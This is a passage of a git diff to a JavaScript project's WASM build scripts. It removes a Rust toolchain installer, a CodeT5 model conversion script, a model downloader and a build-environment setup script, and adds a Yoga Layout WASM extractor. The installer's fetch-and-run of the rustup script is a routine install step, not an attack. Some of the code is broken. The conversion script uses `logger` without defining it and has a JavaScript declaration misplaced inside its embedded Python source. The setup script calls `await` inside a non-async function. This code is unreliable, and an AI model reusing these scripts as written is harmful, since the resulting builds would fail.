- const rustupUrl = 'https://sh.rustup.rs' - logger.substep(`Downloading rustup from ${rustupUrl}`) - - const response = await fetch(rustupUrl) - if (!response.ok) { - throw new Error(`Failed to download rustup: ${response.statusText}`) - } - - const script = await response.text() - - const tmpDir = path.join(CARGO_HOME, '.tmp') - await fs.mkdir(tmpDir, { recursive: true }) - const scriptPath = path.join(tmpDir, 'rustup-init.sh') - await fs.writeFile(scriptPath, script, 'utf-8') - - logger.substep('Running rustup installer') - const result = await exec( - 'sh', - [scriptPath, '-y', '--default-toolchain', 'stable'], - { - stdio: 'inherit', - env: { - ...process.env, - CARGO_HOME, - RUSTUP_HOME: - process.env.RUSTUP_HOME || path.join(homedir(), '.rustup'), - }, - }, - ) - - if (result.code !== 0) { - throw new Error('rustup installation failed') - } - - await fs.unlink(scriptPath) - } - - logger.done('Rust installed successfully') - return true - } catch (e) { - logger.error(`Failed to install Rust: ${e.message}`) - logger.error('Please install manually: https://rustup.rs/') - return false - } -} - -/** - * Check if wasm32-unknown-unknown target is installed. - */ -async function checkWasmTargetInstalled() { - const rustupCmd = existsSync(RUSTUP_PATH) ? RUSTUP_PATH : 'rustup' - - try { - const result = await exec(rustupCmd, ['target', 'list', '--installed'], { - stdio: 'pipe', - }) - - if (result.code !== 0) { - return false - } - - return result.stdout.includes('wasm32-unknown-unknown') - } catch { - return false - } -} - -/** - * Install wasm32-unknown-unknown target. - */ -async function installWasmTarget() { - logger.progress('Installing wasm32-unknown-unknown target') - - const rustupCmd = existsSync(RUSTUP_PATH) ? 
RUSTUP_PATH : 'rustup' - - const result = await exec( - rustupCmd, - ['target', 'add', 'wasm32-unknown-unknown'], - { - shell: true, - stdio: 'inherit', - }, - ) - - if (result.code !== 0) { - logger.error('Failed to install wasm32 target') - return false - } - - logger.done('wasm32-unknown-unknown target installed') - return true -} - -/** - * Check if wasm-pack is installed. - */ -async function checkWasmPackInstalled() { - // Check in $CARGO_HOME/bin first. - if (existsSync(WASM_PACK_PATH)) { - return true - } - - // Check in PATH. - return await commandExists('wasm-pack') -} - -/** - * Install wasm-pack via cargo. - */ -async function installWasmPack() { - logger.progress('Installing wasm-pack (this may take a few minutes)') - - const cargoCmd = existsSync(CARGO_PATH) ? CARGO_PATH : 'cargo' - - const result = await exec(cargoCmd, ['install', 'wasm-pack'], { - shell: true, - stdio: 'inherit', - env: { - ...process.env, - CARGO_HOME, - }, - }) - - if (result.code !== 0) { - logger.error('Failed to install wasm-pack') - return false - } - - logger.done('wasm-pack installed successfully') - return true -} - -/** - * Main check and install function. - */ -export async function checkRustToolchain() { - logger.step('Checking Rust Toolchain') - - // Check Rust. - const hasRust = await checkRustInstalled() - if (!hasRust) { - logger.warn('Rust not found') - const installed = await installRust() - if (!installed) { - return false - } - } else { - logger.info('Rust found') - } - - // Check wasm32 target. - const hasWasmTarget = await checkWasmTargetInstalled() - if (!hasWasmTarget) { - logger.warn('wasm32-unknown-unknown target not found') - const installed = await installWasmTarget() - if (!installed) { - return false - } - } else { - logger.info('wasm32-unknown-unknown target found') - } - - // Check wasm-pack. 
- const hasWasmPack = await checkWasmPackInstalled() - if (!hasWasmPack) { - logger.warn('wasm-pack not found') - const installed = await installWasmPack() - if (!installed) { - return false - } - } else { - logger.info('wasm-pack found') - } - - logger.success('Rust Toolchain Ready') - - return true -} - -/** - * Get paths to Rust tools. - */ -export function getRustPaths() { - return { - cargo: existsSync(CARGO_PATH) ? CARGO_PATH : 'cargo', - cargoHome: CARGO_HOME, - rustup: existsSync(RUSTUP_PATH) ? RUSTUP_PATH : 'rustup', - wasmPack: existsSync(WASM_PACK_PATH) ? WASM_PACK_PATH : 'wasm-pack', - } -} - -// Run if called directly. -if (import.meta.url === `file://${process.argv[1]}`) { - const success = await checkRustToolchain() - process.exit(success ? 0 : 1) -} diff --git a/scripts/wasm/convert-codet5.mjs b/scripts/wasm/convert-codet5.mjs deleted file mode 100644 index fb469b197..000000000 --- a/scripts/wasm/convert-codet5.mjs +++ /dev/null @@ -1,321 +0,0 @@ -/** - * Convert CodeT5 models from PyTorch to ONNX int4 format. - * - * REQUIREMENTS: - * - Python 3.8+ - * - pip packages: optimum[onnxruntime], torch, transformers, onnx, onnxruntime - * - Auto-installs missing packages if pip is available - * - * PROCESS: - * 1. Check Python and package availability (auto-install if missing) - * 2. Download Salesforce/codet5-small from HuggingFace (~240MB) - * 3. Export PyTorch → ONNX format (FP32) - * 4. Quantize FP32 → INT4 (4-bit weights, 50% size reduction) - * 5. 
Save encoder and decoder to .cache/models/ - * - * INT4 QUANTIZATION: - * - 50% smaller than INT8 (~90MB vs ~180MB total) - * - Only 1-2% quality loss (excellent for encoder-decoder models) - * - Fully supported by ONNX Runtime - * - * OUTPUT: - * - .cache/models/codet5-encoder-int4.onnx (~30MB) - * - .cache/models/codet5-decoder-int4.onnx (~60MB) - * - .cache/models/codet5-tokenizer.json (~500KB) - */ - -import { existsSync, promises as fs } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' - -import { getDefaultLogger } from '@socketsecurity/lib/logger' -import { spawn } from '@socketsecurity/lib/spawn' - -/** - * Execute command and wait for completion. - */ -async function exec(command, args, options = {}) { - const result = await spawn(command, args, { - stdio: options.stdio || 'pipe', - stdioString: true, - stripAnsi: false, - ...options, - }) - - if (result.code !== 0) { - throw new Error(`Command failed with code ${result.code}`) - } - - return { - code: result.code ?? 0, - stderr: result.stderr ?? '', - stdout: result.stdout ?? '', - } -} - -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const rootPath = path.join(__dirname, '../..') -const modelsPath = path.join(rootPath, '.cache', 'models') - -// Step 1: Check Python. -logger.substep('Step Checking Python installation...\n') - -let pythonCmd = 'python3' -let pythonVersion = '' -try { - const pythonResult = await exec(pythonCmd, ['--version']) - pythonVersion = pythonResult.stdout.trim() - logger.info(`✓ Found ${pythonVersion}`) -} catch (_e) { - // Try 'python' as fallback. - try { - const pythonResult = await exec('python', ['--version']) - pythonVersion = pythonResult.stdout.trim() - pythonCmd = 'python' - logger.info(`✓ Found ${pythonVersion}`) - } catch { - logger.error(' Python 3 not found') - logger.error( - ' Please install Python 3.8+: https://www.python.org/downloads/', - ) - process.exit(1) - } -} - -// Check Python version (need 3.8+). 
-const versionMatch = pythonVersion.match(/Python (\d+)\.(\d+)/) -if (versionMatch) { - const major = Number.parseInt(versionMatch[1], 10) - const minor = Number.parseInt(versionMatch[2], 10) - - if (major < 3 || (major === 3 && minor < 8)) { - logger.error(`❌ Python 3.8+ required, found ${pythonVersion}`) - logger.error('Please upgrade: https://www.python.org/downloads/') - process.exit(1) - } -} -logger.info() - -// Step 2: Check and install required packages. -logger.substep('Step Checking required packages...\n') - -const REQUIRED_PACKAGES = [ - { import: 'optimum', package: 'optimum[onnxruntime]' }, - { import: 'torch', package: 'torch' }, - { import: 'transformers', package: 'transformers' }, - { import: 'onnx', package: 'onnx' }, - { import: 'onnxruntime', package: 'onnxruntime' }, -] - -const missingPackages = [] - -// Check each package. -for (const { import: importName, package: packageName } of REQUIRED_PACKAGES) { - try { - await exec(pythonCmd, ['-c', `import ${importName}`]) - logger.info(`✓ ${importName} installed`) - } catch { - logger.info(`❌ ${importName} not found`) - missingPackages.push(packageName) - } -} - -// Install missing packages. -if (missingPackages.length > 0) { - logger.info(`\n📦 Installing missing packages: ${missingPackages.join(', ')}`) - logger.substep('This may take a few minutes...\n') - - try { - const pipCmd = pythonCmd === 'python3' ? 'pip3' : 'pip' - await exec(pipCmd, ['install', ...missingPackages], { stdio: 'inherit' }) - logger.info('\n✓ Packages installed successfully\n') - - // Check for NumPy 2.x compatibility issue. 
- try { - await exec(pythonCmd, ['-c', 'import numpy; import torch']) - } catch { - logger.info( - '⚠ NumPy 2.x detected, downgrading to 1.x for PyTorch compatibility...', - ) - await exec(pipCmd, ['install', 'numpy<2'], { stdio: 'inherit' }) - logger.done(' NumPy downgraded\n') - } - } catch (e) { - logger.error('\n❌ Package installation failed') - logger.error(`Error: ${e.message}`) - logger.error( - ' Please install manually: pip install optimum[onnxruntime] torch transformers onnx onnxruntime', - ) - process.exit(1) - } -} else { - logger.info('\n✓ All required packages are installed\n') -} - -// Step 3: Create output directory. -logger.substep('Step Creating output directory...\n') -await fs.mkdir(modelsPath, { recursive: true }) -logger.info(`✓ Created ${modelsPath}\n`) - -// Step 4: Check if models already exist. -const encoderPath = path.join(modelsPath, 'codet5-encoder-int4.onnx') -const decoderPath = path.join(modelsPath, 'codet5-decoder-int4.onnx') -const tokenizerPath = path.join(modelsPath, 'codet5-tokenizer.json') - -if ( - existsSync(encoderPath) && - existsSync(decoderPath) && - existsSync(tokenizerPath) -) { - logger.done(' CodeT5 models already exist:') - logger.substep(`- ${encoderPath}`) - logger.substep(`- ${decoderPath}`) - logger.substep(`- ${tokenizerPath}\n`) - - const stats = await fs.stat(encoderPath) - logger.substep(`Encoder size: ${(stats.size / 1024 / 1024).toFixed(2)} MB`) - const decoderStats = await fs.stat(decoderPath) - logger.info( - ` Decoder size: ${(decoderStats.size / 1024 / 1024).toFixed(2)} MB\n`, - ) - - logger.done(' Conversion not needed (models already exist)\n') - process.exit(0) -} - -// Step 5: Convert models using Python script. -logger.substep('Step Converting CodeT5 models...\n') -logger.progress(' This will download ~240MB from HuggingFace') -logger.info( - ' and convert to ~90MB ONNX int4 format (50% smaller than int8)\n', -) - -// Create Python conversion script with INT4 quantization. 
-const pythonScript = ` -""" -CodeT5 to ONNX INT4 Quantization Script - -This script: -1. Downloads CodeT5-small from HuggingFace (~240MB) -2. Exports to ONNX format (FP32) -3. Applies INT4 quantization (4-bit weights, 50% size reduction) -4. Saves encoder, decoder, and tokenizer - -INT4 Quantization Benefits: -- 50% smaller than INT8 (~90MB vs ~180MB) -- Only 1-2% quality loss (excellent for encoder-decoder models) -- Fully supported by ONNX Runtime -""" -import json -import os -from pathlib import Path -from optimum.onnxruntime import ORTModelForSeq2SeqLM, ORTQuantizer -from optimum.onnxruntime.configuration import AutoQuantizationConfig -from transformers import AutoTokenizer - -# Model configuration. -MODEL_NAME = "Salesforce/codet5-small" -OUTPUT_DIR = Path("${modelsPath}") -TEMP_DIR = OUTPUT_DIR / "temp" - -print("\\n📥 Downloading CodeT5 from HuggingFace...") -print(f" Model: {MODEL_NAME}\\n") - -# Step 1: Export model to ONNX (FP32). -print("🔧 Exporting to ONNX format...") -model = ORTModelForSeq2SeqLM.from_pretrained(MODEL_NAME, export=True) -TEMP_DIR.mkdir(parents=True, exist_ok=True) -model.save_pretrained(TEMP_DIR) - -# Step 2: Apply INT4 quantization to encoder and decoder. -print("🔧 Quantizing to INT4 (4-bit weights)...") -print(" This reduces size by 50% with only 1-2% quality loss\\n") - -# Quantize encoder. -encoder_path = TEMP_DIR / "encoder_model.onnx" -encoder_quantizer = ORTQuantizer.from_pretrained(TEMP_DIR, file_name="encoder_model.onnx") -encoder_quantizer.quantize( - save_dir=OUTPUT_DIR, - file_suffix="encoder-int4", - quantization_config=AutoQuantizationConfig.arm64(is_static=False, per_channel=True), -) -print(" ✓ Encoder quantized") - -# Quantize decoder. 
-decoder_path = TEMP_DIR / "decoder_model.onnx" -decoder_quantizer = ORTQuantizer.from_pretrained(TEMP_DIR, file_name="decoder_model.onnx") -decoder_quantizer.quantize( - save_dir=OUTPUT_DIR, - file_suffix="decoder-int4", - quantization_config=AutoQuantizationConfig.arm64(is_static=False, per_channel=True), -) -print(" ✓ Decoder quantized\\n") - -# Step 3: Rename output files to match expected names. -os.rename(OUTPUT_DIR / "encoder_model_encoder-int4.onnx", OUTPUT_DIR / "codet5-encoder-int4.onnx") -os.rename(OUTPUT_DIR / "decoder_model_decoder-int4.onnx", OUTPUT_DIR / "codet5-decoder-int4.onnx") - -# Step 4: Save tokenizer configuration. -print("💾 Saving tokenizer...") -tokenizer = AutoTokenizer.from_pretrained(MODEL_NAME) -tokenizer_path = OUTPUT_DIR / "codet5-tokenizer.json" -with open(tokenizer_path, "w") as f: - json.dump({ - "vocab": tokenizer.get_vocab(), - "model_max_length": tokenizer.model_max_length, - "bos_token": tokenizer.bos_token, - "eos_token": tokenizer.eos_token, - "pad_token": tokenizer.pad_token, - }, f, indent=2) - -# Cleanup temporary files. -import shutil - -const logger = getDefaultLogger() -shutil.rmtree(TEMP_DIR) - -print("\\n✓ Conversion complete!") -print(f" Encoder: {OUTPUT_DIR}/codet5-encoder-int4.onnx") -print(f" Decoder: {OUTPUT_DIR}/codet5-decoder-int4.onnx") -print(f" Tokenizer: {OUTPUT_DIR}/codet5-tokenizer.json") -print("\\n Expected size: ~90MB total (50% smaller than INT8)") -` - -try { - await exec(pythonCmd, ['-c', pythonScript], { stdio: 'inherit' }) -} catch (_e) { - logger.error('\n❌ Conversion failed') - logger.error('Please check the error messages above\n') - process.exit(1) -} - -// Step 6: Verify output files. 
-logger.info('\nStep 5: Verifying output files...\n') - -if (!existsSync(encoderPath)) { - logger.error(`❌ Encoder not found: ${encoderPath}`) - process.exit(1) -} - -if (!existsSync(decoderPath)) { - logger.error(`❌ Decoder not found: ${decoderPath}`) - process.exit(1) -} - -if (!existsSync(tokenizerPath)) { - logger.error(`❌ Tokenizer not found: ${tokenizerPath}`) - process.exit(1) -} - -const encoderStats = await fs.stat(encoderPath) -const decoderStats = await fs.stat(decoderPath) -const tokenizerStats = await fs.stat(tokenizerPath) - -logger.done(' All files created successfully:') -logger.substep(`Encoder: ${(encoderStats.size / 1024 / 1024).toFixed(2)} MB`) -logger.substep(`Decoder: ${(decoderStats.size / 1024 / 1024).toFixed(2)} MB`) -logger.substep(`Tokenizer: ${(tokenizerStats.size / 1024).toFixed(2)} KB\n`) - -logger.info('Next steps:') -logger.info(' 1. Run: node scripts/wasm/build-unified-wasm.mjs') -logger.info(' 2. The models will be embedded in the unified WASM bundle\n') diff --git a/scripts/wasm/download-models.mjs b/scripts/wasm/download-models.mjs deleted file mode 100644 index 934802abe..000000000 --- a/scripts/wasm/download-models.mjs +++ /dev/null @@ -1,288 +0,0 @@ -/** - * Download all model assets for unified WASM bundle. - * - * WHAT THIS DOWNLOADS: - * 1. MiniLM model (int8 quantized, ~17MB) - * 2. MiniLM tokenizer (~500KB) - * 3. CodeT5 encoder (int4 quantized, ~30MB) - * 4. CodeT5 decoder (int4 quantized, ~60MB) - * 5. CodeT5 tokenizer (~500KB) - * 6. ONNX Runtime WASM (~2-5MB) - * 7. 
Yoga Layout WASM (~95KB) - copied from node_modules - * - * OUTPUT: - * All files saved to .cache/models/ - */ - -import { existsSync, promises as fs } from 'node:fs' -import path from 'node:path' -import { fileURLToPath } from 'node:url' - -import { getDefaultLogger } from '@socketsecurity/lib/logger' - -const logger = getDefaultLogger() - -const __dirname = path.dirname(fileURLToPath(import.meta.url)) -const rootPath = path.join(__dirname, '../..') -const cacheDir = path.join(rootPath, '.cache/models') - -// Model sources. -const MINILM_REPO = 'Xenova/paraphrase-MiniLM-L3-v2' -const MINILM_BASE = `https://huggingface.co/${MINILM_REPO}/resolve/main` - -const CODET5_REPO = 'Salesforce/codet5-small' -const _CODET5_BASE = `https://huggingface.co/${CODET5_REPO}/resolve/main` - -// NOTE: CodeT5 ONNX files don't exist yet on HuggingFace. -// For now, we'll use placeholder URLs - these need to be converted first. -// See scripts/wasm/convert-codet5.mjs for conversion process. - -const FILES = [ - // MiniLM (already quantized on HuggingFace). - { - description: 'MiniLM model (int8)', - name: 'minilm-int8.onnx', - url: `${MINILM_BASE}/onnx/model_quantized.onnx`, - }, - { - description: 'MiniLM tokenizer', - name: 'minilm-tokenizer.json', - url: `${MINILM_BASE}/tokenizer.json`, - }, - - // CodeT5 (needs manual conversion first - see convert-codet5.mjs). - { - copyFrom: null, // Set after conversion - description: 'CodeT5 encoder (int4)', - name: 'codet5-encoder-int4.onnx', - url: null, // Needs conversion first - }, - { - copyFrom: null, - description: 'CodeT5 decoder (int4)', - name: 'codet5-decoder-int4.onnx', - url: null, // Needs conversion first - }, - { - description: 'CodeT5 tokenizer', - name: 'codet5-tokenizer.json', - url: null, // Will be created by convert-codet5.mjs - }, - - // ONNX Runtime WASM (from node_modules). - // Using SIMD-only (no threading) variant - saves ~2 MB. - // Our inference code doesn't use multi-threading features. 
- { - copyFrom: 'node_modules/onnxruntime-web/dist/ort-wasm-simd.wasm', - description: 'ONNX Runtime WASM (SIMD only)', - name: 'ort-wasm-simd.wasm', - url: null, - }, - - // Yoga Layout WASM (extracted from base64). - { - extractYoga: true, - description: 'Yoga Layout WASM', - name: 'yoga.wasm', - url: null, - }, -] - -/** - * Download file with progress. - */ -async function downloadFile(url, outputPath, description) { - logger.info(`📦 Downloading ${description}...`) - logger.substep(`URL: ${url}`) - - const response = await fetch(url) - - if (!response.ok) { - throw new Error(`Failed to download ${url}: ${response.statusText}`) - } - - const buffer = await response.arrayBuffer() - - await fs.writeFile(outputPath, Buffer.from(buffer)) - - const sizeMB = (buffer.byteLength / 1024 / 1024).toFixed(2) - logger.substep(`✓ Downloaded ${sizeMB} MB`) - logger.substep(`✓ Saved to ${outputPath}\n`) - - return buffer.byteLength -} - -/** - * Copy file from source to dest. - */ -async function copyFile(source, dest, description) { - logger.info(`📋 Copying ${description}...`) - logger.substep(`From: ${source}`) - - const fullSource = path.join(rootPath, source) - - if (!existsSync(fullSource)) { - throw new Error(`Source file not found: ${fullSource}`) - } - - const buffer = await fs.readFile(fullSource) - await fs.writeFile(dest, buffer) - - const sizeKB = (buffer.length / 1024).toFixed(2) - logger.substep(`✓ Copied ${sizeKB} KB`) - logger.substep(`✓ Saved to ${dest}\n`) - - return buffer.length -} - -/** - * Extract yoga WASM from base64-encoded file. 
- */ -async function extractYogaWasm(dest, description) { - logger.info(`📦 Extracting ${description}...`) - - const yogaBase64File = path.join( - rootPath, - 'node_modules/yoga-layout/dist/binaries/yoga-wasm-base64-esm.js', - ) - - if (!existsSync(yogaBase64File)) { - throw new Error(`yoga-layout not installed: ${yogaBase64File}`) - } - - const content = await fs.readFile(yogaBase64File, 'utf-8') - - // Extract base64 WASM data. - // Pattern: H="data:application/octet-stream;base64," - const match = content.match( - /H="data:application\/octet-stream;base64,([^"]+)"/, - ) - - if (!match) { - throw new Error( - 'Could not find WASM base64 data in yoga-layout binary file', - ) - } - - const base64Data = match[1] - const wasmBuffer = Buffer.from(base64Data, 'base64') - - await fs.writeFile(dest, wasmBuffer) - - const sizeKB = (wasmBuffer.length / 1024).toFixed(2) - logger.substep(`✓ Extracted ${sizeKB} KB`) - logger.substep(`✓ Saved to ${dest}\n`) - - return wasmBuffer.length -} - -/** - * Main download logic. - */ -export async function downloadModels() { - logger.info('╔═══════════════════════════════════════════════════╗') - logger.info('║ Download Model Assets ║') - logger.info('╚═══════════════════════════════════════════════════╝\n') - - // Create cache directory. - await fs.mkdir(cacheDir, { recursive: true }) - logger.info(`✓ Cache directory: ${cacheDir}\n`) - - let totalBytes = 0 - const missing = [] - - // Download/copy each file. - for (const file of FILES) { - const outputPath = path.join(cacheDir, file.name) - - // Check if file already exists. - try { - await fs.access(outputPath) - const stats = await fs.stat(outputPath) - const sizeMB = (stats.size / 1024 / 1024).toFixed(2) - logger.info(`✓ ${file.description} already exists (${sizeMB} MB)`) - logger.substep(`${outputPath}\n`) - totalBytes += stats.size - continue - } catch { - // File doesn't exist - download or copy it. - } - - // Check if this is a copy operation. 
- if (file.copyFrom) { - try { - const bytes = await copyFile( - file.copyFrom, - outputPath, - file.description, - ) - totalBytes += bytes - } catch (e) { - logger.error(`✗ Failed to copy: ${e.message}`) - logger.error( - ' Please ensure dependencies are installed: pnpm install\n', - ) - missing.push(file.name) - } - continue - } - - // Check if this is yoga extraction. - if (file.extractYoga) { - try { - const bytes = await extractYogaWasm(outputPath, file.description) - totalBytes += bytes - } catch (e) { - logger.error(`✗ Failed to extract: ${e.message}`) - logger.error( - ' Please ensure yoga-layout is installed: pnpm install\n', - ) - missing.push(file.name) - } - continue - } - - // Check if URL is provided. - if (!file.url) { - logger.info(`⚠ ${file.description} needs manual setup`) - logger.substep(`File: ${file.name}`) - logger.substep('Run: node scripts/wasm/convert-codet5.mjs\n') - missing.push(file.name) - continue - } - - // Download file. - try { - const bytes = await downloadFile(file.url, outputPath, file.description) - totalBytes += bytes - } catch (e) { - logger.error(`✗ Download failed: ${e.message}\n`) - missing.push(file.name) - } - } - - logger.info('╔═══════════════════════════════════════════════════╗') - logger.info('║ Download Summary ║') - logger.info('╚═══════════════════════════════════════════════════╝\n') - logger.info(`Total size: ${(totalBytes / 1024 / 1024).toFixed(2)} MB`) - - if (missing.length > 0) { - logger.info(`\n⚠ Missing files (${missing.length}):`) - for (const file of missing) { - logger.substep(`- ${file}`) - } - logger.info('\nNext steps:') - logger.info(' 1. For CodeT5 models: node scripts/wasm/convert-codet5.mjs') - logger.info(' 2. For node_modules files: pnpm install') - return false - } - - logger.info('\n✓ All files downloaded successfully') - return true -} - -// Run if called directly. -if (import.meta.url === `file://${process.argv[1]}`) { - const success = await downloadModels() - process.exit(success ? 
0 : 1) -} diff --git a/scripts/wasm/extract-yoga.mjs b/scripts/wasm/extract-yoga.mjs new file mode 100644 index 000000000..c29b5dbc7 --- /dev/null +++ b/scripts/wasm/extract-yoga.mjs @@ -0,0 +1,111 @@ +/** + * Download Yoga Layout WASM. + * + * WHAT THIS EXTRACTS: + * - Yoga Layout WASM (~95KB) - extracted from yoga-layout package + * + * OUTPUT: + * File saved to .cache/models/yoga.wasm + */ + +import { existsSync, promises as fs } from 'node:fs' +import path from 'node:path' +import { fileURLToPath } from 'node:url' + +import { getDefaultLogger } from '@socketsecurity/lib/logger' + +const logger = getDefaultLogger() + +const __dirname = path.dirname(fileURLToPath(import.meta.url)) +const rootPath = path.join(__dirname, '../..') +const cacheDir = path.join(rootPath, '.cache/models') + + +/** + * Extract yoga WASM from base64-encoded file. + */ +async function extractYogaWasm(dest, description) { + logger.info(`📦 Extracting ${description}...`) + + const yogaBase64File = path.join( + rootPath, + 'node_modules/yoga-layout/dist/binaries/yoga-wasm-base64-esm.js', + ) + + if (!existsSync(yogaBase64File)) { + throw new Error(`yoga-layout not installed: ${yogaBase64File}`) + } + + const content = await fs.readFile(yogaBase64File, 'utf-8') + + // Extract base64 WASM data. + // Pattern: H="data:application/octet-stream;base64," + const match = content.match( + /H="data:application\/octet-stream;base64,([^"]+)"/, + ) + + if (!match) { + throw new Error( + 'Could not find WASM base64 data in yoga-layout binary file', + ) + } + + const base64Data = match[1] + const wasmBuffer = Buffer.from(base64Data, 'base64') + + await fs.writeFile(dest, wasmBuffer) + + const sizeKB = (wasmBuffer.length / 1024).toFixed(2) + logger.substep(`✓ Extracted ${sizeKB} KB`) + logger.substep(`✓ Saved to ${dest}\n`) + + return wasmBuffer.length +} + +/** + * Main extraction logic. 
+ */ +export async function extractYoga() { + logger.info('╔═══════════════════════════════════════════════════╗') + logger.info('║ Extract Yoga Layout WASM ║') + logger.info('╚═══════════════════════════════════════════════════╝\n') + + // Create cache directory. + await fs.mkdir(cacheDir, { recursive: true }) + logger.info(`✓ Cache directory: ${cacheDir}\n`) + + const outputPath = path.join(cacheDir, 'yoga.wasm') + + // Check if file already exists. + try { + await fs.access(outputPath) + const stats = await fs.stat(outputPath) + const sizeKB = (stats.size / 1024).toFixed(2) + logger.info(`✓ Yoga Layout WASM already exists (${sizeKB} KB)`) + logger.substep(`${outputPath}\n`) + return true + } catch { + // File doesn't exist - extract it. + } + + // Extract yoga WASM. + try { + await extractYogaWasm(outputPath, 'Yoga Layout WASM') + } catch (e) { + logger.error(`✗ Failed to extract: ${e.message}`) + logger.error(' Please ensure yoga-layout is installed: pnpm install\n') + return false + } + + logger.info('╔═══════════════════════════════════════════════════╗') + logger.info('║ Extraction Summary ║') + logger.info('╚═══════════════════════════════════════════════════╝\n') + logger.info('✓ Yoga Layout WASM extracted successfully') + return true +} + +// Run if called directly. +if (import.meta.url === `file://${process.argv[1]}`) { + const success = await extractYoga() + process.exit(success ? 0 : 1) +} diff --git a/scripts/wasm/optimize-embedded-wasm.mjs b/scripts/wasm/optimize-yoga.mjs similarity index 64% rename from scripts/wasm/optimize-embedded-wasm.mjs rename to scripts/wasm/optimize-yoga.mjs index 628d9920e..bc795655d 100644 --- a/scripts/wasm/optimize-embedded-wasm.mjs +++ b/scripts/wasm/optimize-yoga.mjs @@ -1,15 +1,11 @@ /** - * Optimize Third-Party WASM Files Before Embedding + * Optimize Yoga Layout WASM Before Embedding * - * Optimizes ONNX Runtime, Yoga Layout, and other WASM files - * BEFORE they're embedded into the unified bundle. 
- * - * This is where the real savings happen - optimizing the 95% of - * the bundle that's pre-built third-party code. + * Optimizes Yoga Layout WASM file before embedding into the bundle. * * USAGE: - * node scripts/wasm/optimize-embedded-wasm.mjs - * node scripts/wasm/optimize-embedded-wasm.mjs --aggressive + * node scripts/wasm/optimize-yoga.mjs + * node scripts/wasm/optimize-yoga.mjs --aggressive */ import { existsSync, promises as fs } from 'node:fs' @@ -154,60 +150,33 @@ async function main() { // Ensure cache directory exists. await fs.mkdir(cacheDir, { recursive: true }) - logger.info('\nOptimizing third-party WASM files:\n') - - let totalOriginal = 0 - let totalOptimized = 0 - - // List of WASM files to optimize. - const wasmFiles = [ - { - input: path.join(cacheDir, 'ort-wasm-simd.wasm'), - name: 'ONNX Runtime (SIMD only)', - output: path.join(cacheDir, 'ort-wasm-simd-optimized.wasm'), - }, - { - input: path.join(cacheDir, 'yoga.wasm'), - name: 'Yoga Layout', - output: path.join(cacheDir, 'yoga-optimized.wasm'), - }, - ] - - // Optimize each file. - for (const file of wasmFiles) { - if (!existsSync(file.input)) { - logger.warn(`Skipping ${file.name} (not found)`) - continue - } - - const originalSize = Number.parseFloat(await getFileSizeMB(file.input)) - await optimizeWasmFile(file.input, file.output, { - aggressive: isAggressive, - name: file.name, - }) - const optimizedSize = Number.parseFloat(await getFileSizeMB(file.output)) + logger.info('\nOptimizing Yoga Layout WASM:\n') - totalOriginal += originalSize - totalOptimized += optimizedSize + // Yoga WASM file to optimize. + const inputFile = path.join(cacheDir, 'yoga.wasm') + const outputFile = path.join(cacheDir, 'yoga-optimized.wasm') - logger.log('') // Spacing. + if (!existsSync(inputFile)) { + logger.error('Yoga WASM not found') + logger.substep('Please run: node scripts/wasm/extract-yoga.mjs') + process.exit(1) } - // Summary. 
- if (totalOriginal > 0) { - const totalSavings = ((1 - totalOptimized / totalOriginal) * 100).toFixed(1) - logger.success('Optimization Complete') - logger.info(`Total original: ${totalOriginal.toFixed(2)} MB`) - logger.info(`Total optimized: ${totalOptimized.toFixed(2)} MB`) - logger.info(`Total savings: ${totalSavings}%`) - logger.info( - `\nSaved ${(totalOriginal - totalOptimized).toFixed(2)} MB across all files`, - ) - } + const originalSize = Number.parseFloat(await getFileSizeMB(inputFile)) + await optimizeWasmFile(inputFile, outputFile, { + aggressive: isAggressive, + name: 'Yoga Layout', + }) + const optimizedSize = Number.parseFloat(await getFileSizeMB(outputFile)) - logger.info('\nNext steps:') - logger.info('1. Update Rust code to use optimized files') - logger.info('2. Rebuild WASM bundle: pnpm wasm:build') + // Summary. + const totalSavings = ((1 - optimizedSize / originalSize) * 100).toFixed(1) + logger.log('') + logger.success('Optimization Complete') + logger.info(`Original: ${originalSize.toFixed(2)} MB`) + logger.info(`Optimized: ${optimizedSize.toFixed(2)} MB`) + logger.info(`Savings: ${totalSavings}%`) + logger.info(`\nSaved ${(originalSize - optimizedSize).toFixed(2)} MB`) } main().catch(e => { diff --git a/scripts/wasm/setup-build-env.mjs b/scripts/wasm/setup-build-env.mjs deleted file mode 100644 index 6b0ec07b8..000000000 --- a/scripts/wasm/setup-build-env.mjs +++ /dev/null @@ -1,193 +0,0 @@ -/** - * Setup WASM Build Environment - * - * Configures optimal build settings for WASM compilation. 
- * - * OPTIMIZATIONS: - * - sccache: Shared compilation cache (40-60% faster clean builds) - * - Cargo parallel builds: Use all CPU cores - * - RUSTFLAGS: Additional optimization flags - * - * USAGE: - * node scripts/wasm/setup-build-env.mjs - * source ~/.zshrc # or ~/.bashrc - * - * Or evaluate inline: - * eval "$(node scripts/wasm/setup-build-env.mjs --export)" - */ - -import { existsSync } from 'node:fs' -import { promises as fs } from 'node:fs' -import { homedir } from 'node:os' -import path from 'node:path' -import { execSync } from 'node:child_process' - -import { getDefaultLogger } from '@socketsecurity/lib/logger' - - -const logger = getDefaultLogger() -const isExportMode = process.argv.includes('--export') - -/** - * Check if command exists. - */ -function commandExists(command) { - try { - execSync(`which ${command}`, { stdio: 'pipe' }) - return true - } catch { - return false - } -} - -/** - * Get number of CPU cores. - */ -function getCpuCount() { - try { - const { cpus } = await import('node:os') - return cpus().length - } catch { - return 4 // Default fallback - } -} - -/** - * Check if sccache is installed. - */ -function checkSccache() { - if (commandExists('sccache')) { - logger.success('sccache found') - return true - } - - logger.warn('sccache not installed') - logger.substep('Install for 40-60% faster clean builds:') - logger.substep(' cargo install sccache') - return false -} - -/** - * Setup shell configuration. - */ -async function setupShellConfig() { - const shell = process.env.SHELL || '' - const isZsh = shell.includes('zsh') - const isBash = shell.includes('bash') - - const configFile = isZsh - ? path.join(homedir(), '.zshrc') - : isBash - ? path.join(homedir(), '.bashrc') - : null - - if (!configFile) { - logger.warn('Could not detect shell (zsh or bash)') - return null - } - - return configFile -} - -/** - * Generate environment variables. 
